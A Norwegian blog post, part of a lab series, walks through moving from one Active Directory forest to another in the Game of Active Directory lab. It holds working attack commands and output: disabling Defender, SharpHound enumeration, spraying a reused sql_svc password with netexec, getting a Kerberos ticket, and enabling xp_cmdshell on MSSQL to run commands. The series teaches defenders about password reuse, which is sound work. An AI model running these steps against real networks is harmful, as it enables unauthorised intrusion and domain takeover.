Game of Active Directory del 3.3 – Persistence Privilege escalation & Lateral Movement – Cross Forest.
Forord: Denne bloggserien viser reelle metoder angripere bruker for å bevege seg inn i, og ta over et AD miljø. All denne informasjonen er allerede offentlig tilgjengelig, og deles ikke for å gi grunnkurs i nettkriminalitet, men for å spre kunnskap om hvorfor vi må beskytte oss. Du må kun benytte disse verktøyene, metodene og prosedyrene i miljøer der du har fått eksplisitt samtykke av eier til å gjøre dette.
I forrige post anskaffet vi oss full kontroll over hele sevenkingdoms.local AD-skogen. I denne posten skal vi krysse over til essos.local ved å misbruke forest trust i AD.
Enumerere angrepsbaner
Vi slår av defender og kjører Sharphound.exe og samler inn informasjon om mulige angrepsbaner inn i essos.local
PS C:\tmp> .\SharpHound.exe
2025-10-04T14:02:31.6129671-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-10-04T14:02:31.6910954-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices, LdapServices, WebClientService, SmbInfo
2025-10-04T14:02:31.7067204-07:00|INFORMATION|Initializing SharpHound at 2:02 PM on 10/4/2025
2025-10-04T14:02:31.7223489-07:00|INFORMATION|Resolved current domain to sevenkingdoms.local
2025-10-04T14:02:31.8160907-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices, LdapServices, WebClientService, SmbInfo
2025-10-04T14:02:31.8629693-07:00|INFORMATION|Beginning LDAP search for sevenkingdoms.local
2025-10-04T14:02:31.9410915-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SEVENKINGDOMS.LOCAL
2025-10-04T14:02:32.2379734-07:00|INFORMATION|Beginning LDAP search for sevenkingdoms.local Configuration NC
2025-10-04T14:02:32.2379734-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SEVENKINGDOMS.LOCAL
2025-10-04T14:02:32.6285977-07:00|INFORMATION|Producer has finished, closing LDAP channel
2025-10-04T14:02:32.6442219-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-10-04T14:02:36.9408560-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2025-10-04T14:02:36.9408560-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2025-10-04T14:02:37.0189775-07:00|INFORMATION|Status: 366 objects finished (+366 73.2)/s -- Using 87 MB RAM
2025-10-04T14:02:37.0189775-07:00|INFORMATION|Enumeration finished in 00:00:05.1580981
2025-10-04T14:02:37.0658549-07:00|INFORMATION|Saving cache with stats: 34 ID to type mappings.
1 name to SID mappings.
1 machine sid mappings.
4 sid to domain mappings.
0 global catalog mappings.
2025-10-04T14:02:37.0814798-07:00|INFORMATION|SharpHound Enumeration Completed at 2:02 PM on 10/4/2025! Happy Graphing!Vi enumererer også essos.local ved å kjøre sharphound en gang til, og samtidig spesifisere -d essos.local
PS C:\tmp> .\SharpHound.exe -d essos.local
2025-10-04T14:09:52.5512713-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-10-04T14:09:52.6293949-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices, LdapServices, WebClientService, SmbInfo
2025-10-04T14:09:52.6450198-07:00|INFORMATION|Initializing SharpHound at 2:09 PM on 10/4/2025
2025-10-04T14:09:53.0043984-07:00|INFORMATION|Loaded cache with stats: 34 ID to type mappings.
1 name to SID mappings.
1 machine sid mappings.
4 sid to domain mappings.
0 global catalog mappings.
2025-10-04T14:09:53.1293985-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices, LdapServices, WebClientService, SmbInfo
2025-10-04T14:09:53.1918987-07:00|INFORMATION|Beginning LDAP search for essos.local
2025-10-04T14:09:53.2700164-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.2700164-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.2700164-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.2700164-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.2856483-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.2856483-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.3012676-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.3012676-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.3012676-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.3012676-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.3012676-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.3169012-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.3169012-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.3169012-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.3169012-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.3169012-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.3325229-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.3481429-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.3481429-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.3481429-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.4731409-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.5043921-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5043921-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5043921-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5512659-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.5512659-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.5668911-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.5668911-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.5668911-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.5668911-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.5668911-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.5668911-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.5825144-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5825144-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5825144-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5825144-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5825144-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5825144-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5825144-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.5825144-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5825144-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5825144-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5825144-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5825144-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5825144-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5825144-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5825144-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5825144-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5981415-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5981415-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.5981415-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5981415-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5981415-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.5981415-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5981415-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.5981415-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.6137704-07:00|INFORMATION|Beginning LDAP search for essos.local Configuration NC
2025-10-04T14:09:53.6137704-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.6137704-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.6293937-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.6450155-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.6918927-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.6918927-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.6918927-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.6918927-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.6918927-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.7075169-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.7075169-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.7543899-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.7543899-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.7543899-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.7543899-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.7700140-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.7543899-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.7700140-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.7700140-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.7700140-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.7700140-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.7700140-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.7700140-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.7856411-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.7856411-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.7856411-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.7856411-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.7856411-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.7856411-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.8168936-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.8168936-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.8168936-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.8168936-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.8168936-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.8168936-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.8168936-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.8325162-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.8637642-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.8793895-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.9731414-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.9731414-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.9731414-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.9731414-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:54.0356380-07:00|INFORMATION|Producer has finished, closing LDAP channel
2025-10-04T14:09:53.9731414-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:54.0512619-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-10-04T14:09:56.4106701-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2025-10-04T14:09:56.4262463-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2025-10-04T14:09:56.4895143-07:00|INFORMATION|Status: 375 objects finished (+375 125)/s -- Using 79 MB RAM
2025-10-04T14:09:56.4895143-07:00|INFORMATION|Enumeration finished in 00:00:03.3102631
2025-10-04T14:09:56.5520217-07:00|INFORMATION|Saving cache with stats: 61 ID to type mappings.
2 name to SID mappings.
2 machine sid mappings.
8 sid to domain mappings.
0 global catalog mappings.
2025-10-04T14:09:56.5520217-07:00|INFORMATION|SharpHound Enumeration Completed at 2:09 PM on 10/4/2025! Happy Graphing!Analysere angrepsbaner
Vi logger inn på Bloodhound og laster opp zipfilene vi fikk fra Sharphound for analyse.
Vi venter på at bloodhound gjør seg ferdig med å tygge gjennom datamengden, det tar ca 1 minutt i dette tilfellet.
Når begge datakolleksjonene er ferdigtygget kan vi sjekke “Data Quality” for å se hva vi har samlet inn.
Fotfeste i Essos.
Vi trenger å få et fotfeste inn i essos.local og det finnes flere måter å gjøre det på. Selv om AD Forest skal være en sikkerhetsbarriære er det veldig fort gjort å gjøre noen feil, og ende opp i en situasjon der trusselaktører fort klarer å spre seg utenfor den opprinnelige AD skogen.
I dette tilfellet ønsker jeg først og fremst å poengtere hvor alvorlig det er med gjenbruk av passord, så fokus faller på kompromittering via et gjenbrukt passord vi fant tidligere.
Det viser seg at sql_svc kontopassordet vi fant i mssql konfigurasjonsfilene på castelblack i north.sevenkingdoms.local også har blitt brukt på konto med samme navn, som kjører mssql på braavos.essos.local
Dette ser vi dersom vi scanner etter mssql tjenester på nettverket med kjent brukernavn og passord, ved hjelp av verktøyet netexec:
$ netexec mssql 10.3.2.10-30 -u sql_svc -p "YouWillNotKerboroast1ngMeeeeee"
MSSQL 10.3.2.22 1433 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local)
MSSQL 10.3.2.23 1433 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local)
MSSQL 10.3.2.22 1433 CASTELBLACK [+] north.sevenkingdoms.local\sql_svc:YouWillNotKerboroast1ngMeeeeee (Pwn3d!)
MSSQL 10.3.2.23 1433 BRAAVOS [+] essos.local\sql_svc:YouWillNotKerboroast1ngMeeeeee (Pwn3d!)
Running nxc against 21 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00Vi bekrefter at vi kan få logget oss på mssql tjeneren med sql_svc og “YouWillNotKerboroast1ngMeeeeee” ved å først etterspørre en Kerberos Ticket-Granting-Ticket fra Kerberos Key Distribution Center i Essos.local, så peker vi KRB5CCNAME mot TGTen.
$ impacket-getTGT essos.local/sql_svc:YouWillNotKerboroast1ngMeeeeee
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in sql_svc.ccache
$ export KRB5CCNAME=/home/kali/Documents/goad-lab/sql_svc.ccacheDeretter kobler vi oss på braavos.essos.local sin mssqltjeneste med impacket-mssqlclient og spesifiserer at vi skal bruke kerberosbilletten vår for å skaffe oss tilgang.
$ impacket-mssqlclient -k -no-pass braavos.essos.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BRAAVOS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BRAAVOS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (ESSOS\sql_svc dbo@master)> ?
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
enum_db - enum databases
enum_links - enum linked servers
enum_impersonate - check logins that can be impersonated
enum_logins - enum login users
enum_users - enum current db users
enum_owner - enum db owner
exec_as_user {user} - impersonate with execute as user
exec_as_login {login} - impersonate with execute as login
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
xp_dirtree {path} - executes xp_dirtree on the path
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
use_link {link} - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
! {cmd} - executes a local shell cmd
upload {from} {to} - uploads file {from} to the SQLServer host {to}
show_query - show query
mask_query - mask queryVi er nå inne på microsoft SQL tjenesten på braavos.essos.local som sql_svc brukeren.
Det første vi ønsker å gjøre er å sørge for at xp_cmdshell er påslått.
SQL (ESSOS\sql_svc dbo@master)> enable_xp_cmdshell
INFO(BRAAVOS\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(BRAAVOS\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.Vi kan nå kjøre cmd.exe kommandoer på braavos via mssql tjeneren.
SQL (ESSOS\sql_svc dbo@master)> xp_cmdshell whoami
output
-------------
essos\sql_svc
NULL
SQL (ESSOS\sql_svc dbo@master)> xp_cmdshell hostname
output
-------
braavos
NULL Bloodhound redux
Hvorfor tok jeg meg bryet med å scanne med sharphound og å mate inn data i bloodhound hvis ikke det skal brukes? Vel, fordi jeg bestemte meg for å gå for en mer banal angrepsbane halvveis gjennom. Jeg hadde først tenkt å demonstrere angrepsvektorer som har mer med domain trust, foreign security principals etc å gjøre – men endte med å gå for noe så simpelt som passordmisbruk.
For å ikke la disse dataene gå til spille kan vi se litt på hva Bloodhound kan foreslå for veien videre.
Vi merker sql_svc som kompromittert, og søker raskeste veiene til Enterprise Administrator i Essos.local.
SQL_SVC er medlem av Domain Users, som kan utnytte ADCSESC1 sårbarheten til å ta over hele essos.local, som gir oss kontroll over Administrators gruppen, som gir oss rettighet til å legge oss selv inn i Enterprise Admins.
SQL_SVC er også SQLAdmin på braavos.essos.local som vi har sett, og har fått et shell på den serveren. Denne serveren er satt opp som sertifikatserver for essos.local, og vi kan dermed utføre et “Golden Certificate” angrep for å ta kontroll over essos.local, og dermed igjen gjøre oss selv til eiere av hele Essos.Local
Bloodhound er ett av verktøyene jeg bruker jevnlig for å kartlegge sårbarheter, og her kan vi se et eksempel fra denne Game of Active Directory labben hva som kommer opp når jeg leter etter “shortest path to tier zero / domain admin”.
Refleksjoner
Vi ser hvordan svake konfigurasjoner kan kompromittere ikke bare en hel AD forest, men i mange tilfeller kan vi også krysse til andre AD Forests via forskjellige angrepsbaner – av og til så banale ting som gjenbrukte passord, selv når passordet er sterkt i utgangspunktet hjelper det svært lite når passordet er på avveie.
Det er også verdt å merke seg at i Active Directory så saltes ikke passordene når de lagres i databasen, slik at samme passord vil resultere i samme hash uansett hvilket AD du befinner deg i, i verden. Det gjør at lister med millioner av kjente passord:hash kombinasjoner florerer på nettet, og som vi også har sett kan vi ofte angripe med pass-the-hash angrep uansett, så det er ikke alltid nødvendig å cracke passordet så lenge man har fanget opp hashen i et miljø med mangelfull SMB Signering.
I neste post skal vi se på hvordan vi kan misbruke feilkonfigurasjoner i Active Directory Certificate Services for å kompromittere hele essos.local.